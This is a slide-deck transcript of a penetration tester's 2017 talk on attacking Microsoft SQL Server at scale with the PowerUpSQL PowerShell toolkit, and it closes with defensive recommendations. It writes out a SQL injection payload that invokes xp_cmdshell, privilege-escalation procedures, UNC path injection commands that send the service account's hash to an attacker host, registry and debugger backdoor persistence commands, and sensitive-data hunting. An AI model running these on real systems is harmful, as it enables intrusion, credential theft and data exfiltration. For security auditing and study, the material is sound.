SlideShare une entreprise Scribd logo
1  sur  109
Hacking SQL Server
on Scale with PowerShell
____________________________________________________
2017
Speaker Information
Name: Scott Sutherland
Job: Network & Application Pentester @ NetSPI
Twitter: @_nullbind
Slides: http://slideshare.net/nullbind
http://slideshare.net/netspi
Blogs: https://blog.netspi.com/author/scott-sutherland/
Code: https://github.com/netspi/PowerUpSQL
https://github.com/nullbind
Presentation Overview
● PowerUpSQL Overview
● SQL Server Discovery
● Privilege Escalation Scenarios
o Domain user to SQL Server login
o SQL Server Login to Sysadmin
o Sysadmin to Windows Admin
o Windows Admin to Sysadmin
o Domain Escalation
● Post Exploitation Activities
● General Recommendations
Why SQL Server?
● Used in most enterprise environments
● Used by a lot of development teams
● Used by a lot of vendor solutions
● Supports Windows authentication both
locally and on the domain
● Lots of integration with other Windows
services and tools
Why PowerShell?
● Native to Windows
● Run commands in memory
● Run managed .net code
● Run unmanaged code
● Avoid detection by Anti-virus
● Already flagged as "trusted" by most
application whitelist solutions
● A medium used to write many open source
Pentest toolkits
PowerUpSQL
https://github.com/netspi/PowerUpSQL
PowerUpSQL
https://www.powershellgallery.com/packages/PowerUpSQL/
PowerUpSQL Overview: Primary Goals
● Instance Discovery
● Auditing
● Exploitation
● Scalable
● Flexible
● Portable
https://github.com/netspi/PowerUpSQL
PowerUpSQL Overview: Functions
Primary Attack Functions
● Invoke-SQLDumpInfo
● Invoke-SQLAudit
● Invoke-SQLEscalatePriv
Popular Auxiliary Functions
● Get-SQLInstanceDomain
● Invoke-SQLOsCmd
● Invoke-SQLOsCLR
● Invoke-SQLImperstonateService
● Invoke-SQLAuditDefaultLoginPw
● Invoke-SQLAuditWeakLoginPw
https://github.com/NetSPI/PowerUpSQL/wikiCurrently over 70 Functions
PowerUpSQL Overview: Help?
List Functions
Get-Command –Module PowerUpSQL
PowerUpSQL Overview: Help?
Get Command Help
Get-Help Get-SQLServerInfo -Full
SQL Server
Discovery
SQL Server Discovery: Techniques
Attacker Perspective Attack Technique
Unauthenticated ● List from file
● TCP port scan
● UDP port scan
● UDP ping of broadcast addresses
● Azure DNS dictionary attack (x.databases.windows.net)
● Azure DNS lookup via public resources
Local User ● Services
● Registry entries
Domain User ● Service Principal Names
● Azure Portal / PowerShell Modules
SQL Server Discovery: PowerUpSQL
Attacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog: https://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql/
Escalating
Privileges
Unauthenticated / Domain User to SQL Login
Testing Login Access: PowerUpSQL
Attacker Perspective Attack PowerUpSQL Function Example
Unauthenticated Dictionary
Attacks
Invoke-SQLAuditWeakLoginPw –Instance “Server1Instance1”
-UserFile c:tempusers.txt –PassFile C:tempPasswords.txt
Unauthenticated Default
Vendor
Passwords
Get-SQLInstanceFile C:tempComputers.txt |
Select Computername |
Get-SQLInstanceScanUDPThreaded –Verbose |
Get-SQLServerLoginDefaultPw -Verbose
Local User Excessive
Login Priv
Get-SQLInstance | Get-SQLConnectionTest -Verbose
Domain Account Excessive
Login Priv
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded
-Verbose
Testing Login Access: Default App Pw
Testing Login Access: Reusing Results
Process Command Example
Enumerate
Accessible Servers
$Accessible = Get-SQLInstanceDomain |
Get-SQLConnectionTestThreaded -Verbose -Threads 15 |
Where-Object {$_.Status –like “Accessible”}
Get server information $Acessible | Get-SQLServerInfo -Verbose
Get database list $Acessible | Get-SQLDatabase -Verbose
Perform audit $Acessible | Invoke-SQLAudit -Verbose
Do I have to rerun instance discovery every time I want to run a command? No.
Testing Login Access: DEMO
Identifying Excessive Login Privileges
as a Domain User
Testing Login Access: Demo
DEMO
Escalating Privileges: Domain User
Why can Domain Users login into so
many SQL Servers?
● Admins give them access
● Privilege inheritance issue on
domain systems = Public role
access
● SQL Server Express is commonly
vulnerable
● A lot of 3rd party solutions are
affected
Escalating Privileges: Domain User
Why can Domain Users login into so
many SQL Servers?
● Admins give them access
● Privilege inheritance issue on
domain systems = Public role
access
● SQL Server Express is commonly
vulnerable
● A lot of 3rd party solutions are
affected
Escalating Privileges: Domain User
Why can Domain Users login into so
many SQL Servers?
● Admins give them access
● Privilege inheritance issue on
domain systems = Public role
access
● SQL Server Express is commonly
vulnerable
● A lot of 3rd party solutions are
affected
Escalating
Privileges
SQL Login to SysAdmin
Escalating Privileges: Weak PWs
Didn’t we just cover this? Yes, but there’s more…
Attacker Perspective Attack PowerUpSQL Function Example
Unauthenticated Dictionary
Attacks
Invoke-SQLAuditWeakLoginPw –Instance “Server1Instance1”
-UserFile c:tempusers.txt –PassFile C:tempPasswords.txt
Unauthenticated Default
Vendor
Passwords
Get-SQLInstanceFile C:tempComputers.txt |
Select Computername |
Get-SQLInstanceScanUDPThreaded –Verbose |
Get-SQLServerLoginDefaultPw -Verbose
Domain Account Excessive
Login Priv
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLServerLoginDefaultPw –
Verbose
Escalating Privileges: Weak PWs
…we can also enumerate SQL Server logins and Domain Accounts 
Technique PowerUpSQL Function
Blind Login Enumeration
+
Dictionary Attack
=
Super Cool!
Invoke-SQLAuditWeakLoginPw
• Enumerate all SQL Server logins with the Public role
• Enumerate all domain accounts with the Public role
Escalating Privileges: Weak PWs
Enumerating SQL Logins
1. Attempt to list all SQL Server
logins and fail.
Escalating Privileges: Weak PWs
Enumerating SQL Logins
1. Attempt to list all SQL Server
logins and fail.
2. Get principal id for the sa
account with “suser_id”
Escalating Privileges: Weak PWs
Enumerating SQL Logins
1. Attempt to list all SQL Server
logins and fail.
2. Get principal id for the sa account
with “suser_id”
3. Use “suser_name” to get SQL
logins using just principal ID
Escalating Privileges: Weak PWs
Enumerating SQL Logins
1. Attempt to list all SQL Server
logins and fail.
2. Get principal id for the sa account
with “suser_id”
3. Use “suser_name” to get SQL
logins using just principal ID
4. Increment number and repeat
Escalating Privileges: Weak PWs
Enumerating SQL Logins
1. Attempt to list all SQL Server
logins and fail.
2. Get principal id for the sa account
with “suser_id”
3. Use “suser_name” to get SQL
logins using just principal ID
4. Increment number and repeat
select n [id], SUSER_NAME(n) [user_name]
from (
select top 10000 row_number() over(order by t1.number) as N
from master..spt_values t1
cross join master..spt_values t2
) a
where SUSER_NAME(n) is not null
Code gifted from @mobileck
Source:
https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges: Weak PWs
Enumerating Domain Users
1. Get the domain
Domain of SQL
Server
Escalating Privileges: Weak PWs
Enumerating Domain Users
1. Get the domain
2. GID RID of default group
Full RID of
Domain Admins
group
Escalating Privileges: Weak PWs
Enumerating Domain Users
1. Get the domain
2. GID RID of default group
3. Grab the first 48 Bytes of the full RID
RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000
SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges: Weak PWs
Enumerating Domain Users
1. Get the domain
2. GID RID of default group
3. Grab the first 48 Bytes of the full RID
4. Create new RID with by appending
a hex number value and the SID
1. Start with number, 500
2. Convert to hex, F401
3. Pad with 0 to 8 bytes, F4010000
4. Concatenate the SID and the new RID
SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000
Escalating Privileges: Weak PWs
Enumerating Domain Users
1. Get the domain
2. GID RID of default group
3. Grab the first 48 Bytes of the full RID
4. Create new RID with by appending a
hex number value and the SID
5. Use “suser_name” function to get
domain object name
1. Start with number, 500
2. Convert to hex, F401
3. Pad with 0 to 8 bytes, F4010000
4. Concatenate the SID and the new RID
SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000
Escalating Privileges: Weak PWs
Enumerating Domain Users
1. Get the domain
2. GID RID of default group
3. Grab the first 48 Bytes of the full RID
4. Create new RID with by appending a
hex number value and the SID
5. Use “suser_name” function to get
domain object name
6. Increment and repeat
1. Start with number, 500
2. Convert to hex, F401
3. Pad with 0 to 8 bytes, F4010000
4. Concatenate the SID and the new RID
SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000
Escalating Privileges: DEMO
Get-SQLFuzzServerLogin
Invoke-SQLAuditWeakLoginPw
Get-SQLFuzzDomainAccount
Escalating Privileges: Impersonation
1. Impersonate Privilege
• Server: EXECUTE AS LOGIN
• Database: EXECUTE AS USER
2. Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER
• Signed with cert login
3. Automatic Execution of Stored Procedures
4. Agent Jobs
• User, Reader, and Operator roles
5. xp_cmdshell proxy acount
6. Create Databse Link to File or Server
7. Import / Install Custom Assemblies
8. Ad-Hoc Queries
9. Shared Service Accounts
10. Database Links
11. UNC Path Injection
12. Python code execution
Impersonate Privilege
• Can be used at server layer
o EXECUTE AS LOGIN
• Can be used at database layer
o EXECUTE AS USER
Pros
• Execute queries/commands in another user context
Cons
• Commands and queries are not limited in any way
• Requires database to be configured as trustworthy
for OS command execution
Escalating Privileges: Impersonation
Impersonate Privilege
• Can be used at server layer
o EXECUTE AS LOGIN
• Can be used at database layer
o EXECUTE AS USER
Escalating Privileges: Impersonation
Impersonate Privilege
• Can be used at server layer
o EXECUTE AS LOGIN
• Can be used at database layer
o EXECUTE AS USER
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection
Issues
• EXECUTE AS OWNER can be used to execute a
stored procedure as another login
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don’t have to grant IMPERSONATE
Cons
• No granular control over the database owner’s privileges
• DB_OWNER role can EXECUTE AS OWNER of the DB,
which is often a sysadmin
• Requires database to be configured as trustworthy for
OS command execution
• Impersonation can be done via SQL injection under
specific conditions
• Impersonation can be done via command injection under
specific conditions
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection
Issues
• EXECUTE AS OWNER can be used to execute a
stored procedure as another login
• DB_OWNER role can impersonate the actual
database owner
USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember
'MyAppUser','sysadmin'
GO
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection
Issues
• EXECUTE AS OWNER can be used to execute a
stored procedure as another login
• DB_OWNER role can impersonate the actual
database owner
USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember
'MyAppUser','sysadmin'
GO
SYSADMIN
is often the
OWNER
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection
Issues
• Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Pros
• Can execute queries/commands in another user
context
• Limit commands and queries
• Don’t have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as
trustworthy for OS command execution
Cons
• Impersonation can be done via SQL injection
under specific conditions
• Impersonation can be done via command
injection under specific conditions
Escalating Privileges: Impersonation
SQL Injection Example
CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = ‘
SELECT name FROM master..sysdatabases
WHERE name like ''%'+ @DbName+'%'' OR
name=''tempdb''';
EXECUTE(@query)
END
GO
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
Escalating Privileges: Impersonation
SQL Injection Example
CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = ‘
SELECT name FROM master..sysdatabases
WHERE name like ''%'+ @DbName+'%'' OR
name=''tempdb''';
EXECUTE(@query)
END
GO
PURE EVIL
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
Escalating Privileges: Impersonation
SQL Injection Example
EXEC MASTER.dbo.sp_sqli2
'master'';EXEC master..xp_cmdshell ''whoami''--';
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
Escalating Privileges: Impersonation
SQL Injection Example
Escalating Privileges: Impersonation
Automatic Execution of Stored Procedure
• Stored procedures ca be configured to execute
when the SQL Server service restarts
Pros
• Marking a stored procedure to run when the SQL
Server service restarts has many use cases
• Only stored procedures in the master database
can be marked for auto execution
Cons
• No granular control over what context the startup
command is executed in
• All stored procedures marked for auto execution
are executed as ‘sa’, even if ‘sa’ is disabled
• Any non sysadmin access to stored procedures
can lead to execution as ‘sa’
Escalating Privileges: Impersonation
Escalating Privileges: DEMO
Invoke-SQLAudit
Escalating Privileges: Invoke-SQLPrivEsc
Whooray for Automation Demo!
Escalating Privileges: DEMO
Invoke-SQLEscalatePriv
Escalating Privileges: Invoke-SQLPrivEsc
DEMO
Escalating
Privileges
SysAdmin to Windows Service Account
OS Command Execution Through SQL Server
=
Windows Service Account Impersonation
Escalating Privileges: SysAdmin to Win Account
You don’t need to know the password, crack a hash, or PTH.
Escalating Privileges: SysAdmin to Win Account
There are a lot of options for executing OS commands.
Escalating Privileges: SysAdmin to Win Account
Add invoke-sqloscmdclr and agents
Technique Configuration
Change
Requires
Sysadmin
Requires
Disk Read/Write
Notes
xp_cmdshell Yes Yes No sp_configure ‘xp_cmdshell', 1;
RECONFIGURE;
Can be configured with proxy account.
(sp_xp_cmdshell_proxy_account)
Custom Extended Stored
Procedure
No Yes Yes sp_addextendedproc
CLR Assembly Yes No No sp_configure ‘clr enabled', 1;
RECONFIGURE;
sp_configure ‘clr strict security', 1;
RECONFIGURE; -- 2017
Requires: Database has ‘Is_Trustworthy’ flag set.
Requires: CREATE ASSEMBLY permission or sysadmin
Agent Job:
• CmdExec
• PowerShell
• SSIS
• ActiveX: Jscript
• ActiveX: VBScript
No No No Can be configured with proxy account.
Requires one of the roles below:
SQLAgentUserRole
SQLAgentReaderRole
SQLAgentOperatorRole
Python Execution Yes Yes No sp_configure 'external scripts enabled', 1;
RECONFIGURE;
Write to file autorun Yes Yes Yes sp_addlinkedserver
Openrowset
Opendataset
Write to registry autorun Yes Yes Yes xp_regwrite
Escalating Privileges: SysAdmin to Win Account
SQL Server can be configured with different account types.
Escalating Privileges: SysAdmin to Win Account
Service Account Types
● Local User
● Local System
● Network Service
● Local managed service account
● Domain managed service account
● Domain User
● Domain Admin
Escalating Privileges: SysAdmin to Win Account
Escalating Privileges: Invoke-SQLOSCmd
Invoke-SQLOSCMD can be used for basic command execution via xp_cmdshell.
PS C:>$Accessible | Invoke-SQLOSCmd –Command “whoami”
ComputerName Instance CommandResults
--------------------- ----------- --------------
SQLServer1 SQLServer1SQLEXPRESS nt servicemssql$sqlexpress
SQLServer1 SQLServer1STANDARDDEV2014 nt authoritysystem
SQLServer1 SQLServer1 DomainSQLSvc
Escalating
Privileges
Shared Service Accounts
Escalating Privileges: Shared Svc Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server you have it on all of them!
One account to rule them all!
InternetDMZIntranet
LRA HVA
LVA
ADS
LVA
Ports
80 and 443
Ports
1433 and 1434
HVA
PURE
EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
InternetDMZIntranet
LRA HVA
LVA
ADS
LVA
Ports
80 and 443
Ports
1433 and 1434
HVA
PURE
EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
InternetDMZIntranet
LRA HVA
LVA
ADS
LVA
Ports
80 and 443
Ports
1433 and 1434
HVA
PURE
EVIL
Captain Evil
SQL Injection
1
Execute Local Command
via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
InternetDMZIntranet
LRA HVA
LVA
ADS
LVA
Ports
80 and 443
Ports
1433 and 1434
HVA
PURE
EVIL
Captain Evil
SQL Injection
1
Execute Local Command
via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and
gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
Escalating
Privileges
Crawling SQL Server Links
Escalating Privileges: Crawling Links
What’s a SQL Server link?
● SQL Server links are basically persistent database connections for SQL Servers.
Why should I care?
● Short answer = privilege escalation
● Public role can use links to execute queries on remote servers (impersonation)
SELECT * FROM OpenQuery([SQLSERVER2],’SELECT @@Version’)
● Stored procedures can be executed – like xp_cmdshell ;)
● Links can be crawled
InternetDMZIntranet
LRA HVA
LVA
ADS
Ports
80 and 443
Ports
1433 and 1434
HVA
PURE
EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
InternetDMZIntranet
LRA HVA
LVA
ADS
Ports
80 and 443
Ports
1433 and 1434
HVA
PURE
EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
InternetDMZIntranet
LRA HVA
LVA
ADS
Ports
80 and 443
Ports
1433 and 1434
HVA
PURE
EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
D
B
Link
w
ith
LeastPrivileges
DB1
LVA
InternetDMZIntranet
LRA HVA
LVA
ADS
Ports
80 and 443
Ports
1433 and 1434
HVA
PURE
EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
D
B
Link
w
ith
LeastPrivileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and
local commands on
database servers via
nested linked services
2
Escalating Privileges: Crawling Links
Penetration Test Stats
● Database links exist (and can be crawled) in about 50% of environments we’ve seen
● The max number of hops we’ve seen is 12
● The max number of servers crawled is 226
Escalating Privileges: Crawling Links
Old Metasploit Module
● mssql_linkcrawler Module
● Author: Antti Rantasaari and Scott Sutherland - Released 2012
● https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New PowerUpSQL Function
● Get-SQLServerLinkCrawl
● Author: Antti Rantasaari
● https://blog.netspi.com/sql-server-link-crawling-powerupsql/
Escalating Privileges: Crawling Links
Function Description
Get-SQLServerLink Get a list of SQL Server Link on the server.
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command
execution.
Examples
Get-SQLServerLinkCrawl -Verbose -Instance "10.1.1.1SQLSERVER2008“
Get-SQLServerLinkCrawl -Verbose -Instance "10.1.1.1SQLSERVER2008"
-Query “select * from master..sysdatabases”
Get-SQLServerLinkCrawl -Verbose -Instance "10.1.1.1SQLSERVER2008"
-Query “exec master..xp_cmdshell ‘whoami’”
Escalating Privileges: DEMO
Get-SQLServerLinkCrawl
DEMO
Escalating Privileges: Crawling Links
Escalating
Privileges
UNC Path Injection
Escalating Privileges: UNC Injection
UNC Path Injection Summary
● UNC paths are used for accessing remote file servers like so 192.168.1.4file
● Almost all procedures that accept a file path in SQL Server, support UNC paths
● UNC paths can be used to force the SQL Server service account to authenticate to an attacker
● An attacker can then capture the NetNTLM password hash and crack or relay it
● Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges: UNC Injection
Escalating Privileges: UNC Injection
The Issue
• By DEFAULT, the PUBLIC role can execute at least two procedures that accept a file path
xp_dirtree 'attackeripfile‘
xp_fileexists 'attackeripfile‘
The Solution
• EXECUTE rights on xp_dirtree and fileexists can be REVOKED for the Public role
(but no one does that)
UNC Path Injection Cheat Sheet (More options)
• https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e
Escalating Privileges: UNC Injection
Another Issue
• The Public role can perform UNC path injection into the BACKUP and RESTORE
commands even though it can’t perform the actual backup/restore:
BACKUP LOG [TESTING] TO DISK = 'attackeripfile‘
RESTORE LOG [TESTING] FROM DISK = 'attackeripfile'
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016
https://technet.microsoft.com/library/security/MS16-131
• There is no patch for SQL Server 2000 to 2008
Escalating Privileges: UNC Injection
So, in summary…
1. The PUBLIC role can access the
SQL Server service account
NetNTLM password hash by default
2. A ton of domain users have PUBLIC
role access
3. Whooray for domain privilege
escalation!
Escalating Privileges: DEMO
Get-SQLServiceAccountPwHashes
…what? It’s self descriptive 
Escalating Privileges: UNC Path Injection
DEMO
Escalating
Privileges
OS Admin to SysAdmin
Escalating Privileges: OS Admin to SysAdmin
Two things to remember…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges.
Escalating Privileges: OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
Read LSA Secrets x x x x x x
Dump Wdigest or NTLM
password hash from Memory
x x x x x x
Process Migration
(Remote DLL or Shellcode
Injection)
x x x x x x
Steal Authentication Token
from SQL Server service
process
x x x x x x
Log into SQL Server as a local
administrator
x x
Log into SQL Server as a
LocalSystem
x x x
Log into SQL Server in Single
User Mode as a local
administrator
? x x x x x
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options...Approach
Account
Password
Recovery
Account
Impersonation
Default
Sysadmin
Privileges
Common Tools
Read LSA Secrets
(Because service accounts)
X Mimikatz, Metasploit, PowerSploit, Empire, LSADump
Dump Wdigest or NTLM
password hash from Memory
X
Mimikatz, Metasploit, PowerSploit, Empire
Note: This tends to fail on protected processes.
Process Migration
(Remote DLL or Shellcode
Injection)
X
Metasploit, PowerSploit, Empire
Python, Powershell, C, C++
Steal Authentication Token from
SQL Server service process
X
Metasploit, Incognito, Invoke-TokenManipulation
Log into SQL Server as a local
administrator
X
Any SQL Server client.
Note: Only affects older versions.
Log into SQL Server as a
LocalSystem
X
Ay SQL Server client and PSExec.
Note: Only affects older versions.
Log into SQL Server in Single
User Mode as a local
administrator
X DBATools
Escalating Privileges: DEMO
Invoke-SQLImpersonateService
(Wraps Invoke-TokenManipulation)
Common
Post
Exploitation
Activities
Post Exploitation: Overview
Common Post Exploitation Activities
1. Establish Persistence
• SQL Server Layer: startup procedures, agent jobs, triggers, modified code
• OS Layer: Registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
• Target large databases
• Locate transparently encrypted databases
• Search columns based on keywords and sample data
• Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
• All standard methods: Copy database, TCP ports, UDP ports, DNS tunneling,
ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL
yet)
Post Exploitation: Persistence
Task Command Example
Registry Autorun
Persistence
Get-SQLPersistRegRun -Verbose -Name EvilSauce
-Command "EvilBoxEvilSandwich.exe" -Instance
"SQLServer1STANDARDDEV2014"
Debugger Backdoor
Persistence
Get-SQLPersistRegDebugger -Verbose -FileName utilman.exe
-Command 'c:windowssystem32cmd.exe' -Instance
"SQLServer1STANDARDDEV2014"
Post Exploitation: Persistence
Post Exploitation: Finding Data
Task Command Example
Locate Encrypted
Databases
Get-SQLInstanceDomain -Verbose |
Get-SQLDatabaseThreaded –Verbose –Threads 10 -NoDefaults |
Where-Object {$_.is_encrypted –eq “TRUE”}
Locate and Sample
Sensitive Columns
and Export to CSV
Get-SQLInstanceDomain -Verbose |
Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword
“credit,ssn,password” –SampleSize 2 –ValidateCC –NoDefaults |
Export-CSV –NoTypeInformation c:tempdatasample.csv
Post Exploitation: DEMO
Hunting for Sensitive Data
Post Exploitation: Finding Sensitive Data
DEMO
General
Recommendations
General Recommendations
1. Enforce least privilege everywhere!
2. Disable dangerous default stored procedures.
3. Install security patches or upgrade to latest version.
4. Audit and fix insecure configurations.
5. Use policy based management for standardizing configurations.
6. Enable auditing at the server and database levels, and monitor for potentially malicious activity.
Take Aways
1. SQL Server is everywhere
2. SQL Server has many trust relationships with Windows and Active Directory
3. SQL Server has many default and common configurations that can be exploited to gain access
4. Tons of domain users have the ability to login into SQL Server
5. Service accounts have sysadmin privileges
6. Shared service accounts can be dangerous
7. PowerUpSQL can be used for basic auditing and exploiting of common SQL Server issues
@_nullbind https://github.com/netspi/PowerUpSQL
PowerUpSQL Overview: Thanks!
Individual Third Party Code / Direct Contributors
Boe Prox Runspace blogs
Warren F. ( RamblingCookieMonster) Invoke-Parallel function
Oyvind Kallstad Test-IsLuhnValid function
Kevin Robertson Invoke-Inveigh
Joe Bialek Invoke-TokenManipulation
Antti Rantasaari, Eric Gruber, and Alexander
Leary, @leoloobeek, and @ktaranov
Contributions and QA
Khai Tran Design advice
NetSPI assessment team and dev team Design advice
Questions?
Name: Scott Sutherland
Job: Network & Application Pentester @ NetSPI
Twitter: @_nullbind
Slides: http://slideshare.net/nullbind
http://slideshare.net/netspi
Blogs: https://blog.netspi.com/author/scott-sutherland/
Code: https://github.com/netspi/PowerUpSQL
https://github.com/nullbind

Contenu connexe

Tendances

HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory PwnagePetros Koutroumpis
 
Secure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Nessus Software
Nessus SoftwareNessus Software
Nessus SoftwareMegha Sahu
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsAndy Robbins
 
A5: Security Misconfiguration
A5: Security Misconfiguration A5: Security Misconfiguration
A5: Security Misconfiguration Tariq Islam
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
DDoS 방어를 위한 Cloudflare 활용법
DDoS 방어를 위한 Cloudflare 활용법DDoS 방어를 위한 Cloudflare 활용법
DDoS 방어를 위한 Cloudflare 활용법Jean Ryu
 
Cisco Ironport WSA- Introduction and Guide in Short
Cisco Ironport WSA-  Introduction and Guide in ShortCisco Ironport WSA-  Introduction and Guide in Short
Cisco Ironport WSA- Introduction and Guide in ShortPriyank Sharma
 
Burp Suite v1.1 Introduction
Burp Suite v1.1 IntroductionBurp Suite v1.1 Introduction
Burp Suite v1.1 IntroductionAshraf Bashir
 
F5 ASM v12 DDoS best practices
F5 ASM v12 DDoS best practices F5 ASM v12 DDoS best practices
F5 ASM v12 DDoS best practices Lior Rotkovitch
 
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...Codemotion
 

Tendances (20)

HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage
 
Secure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injection
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
Wireless Cracking using Kali
Wireless Cracking using KaliWireless Cracking using Kali
Wireless Cracking using Kali
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
Nessus Software
Nessus SoftwareNessus Software
Nessus Software
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLs
 
Security testing
Security testingSecurity testing
Security testing
 
A5: Security Misconfiguration
A5: Security Misconfiguration A5: Security Misconfiguration
A5: Security Misconfiguration
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
